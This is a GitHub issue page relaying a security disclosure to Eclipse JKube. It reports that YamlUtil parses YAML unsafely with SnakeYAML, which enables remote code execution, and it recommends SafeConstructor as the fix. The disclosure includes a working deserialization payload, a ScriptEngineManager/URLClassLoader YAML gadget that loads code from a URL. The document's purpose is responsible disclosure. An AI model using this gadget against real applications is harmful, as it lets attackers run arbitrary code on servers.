You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
From the Security Team Inbox:
--
https://github.com/eclipse/jkube/blob/master/jkube-kit/common/src/main/java/org/eclipse/jkube/kit/common/util/YamlUtil.java#L112 uses insecure way to construct Yaml Object leading to remote code execution. Here is a sample code which would invoke malicious code hosted in localhost:9000.
String code = "maps: !!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [\"http://localhost:9000/\"]]]]";
YamlUtil.getPropertiesFromYamlString(code);
Please refer SafeConstructor() and https://bitbucket.org/asomov/snakeyaml/wiki/Documentation#markdown-header-restrict-classes-to-be-loaded on using the api securely.
Reference: https://cwe.mitre.org/data/definitions/502.html
--
There's help for managing vulnerabilities in the handbook.
https://www.eclipse.org/projects/handbook/#vulnerability
The text was updated successfully, but these errors were encountered:
Description
Proxy issue for https://bugs.eclipse.org/bugs/show_bug.cgi?id=561261
The text was updated successfully, but these errors were encountered: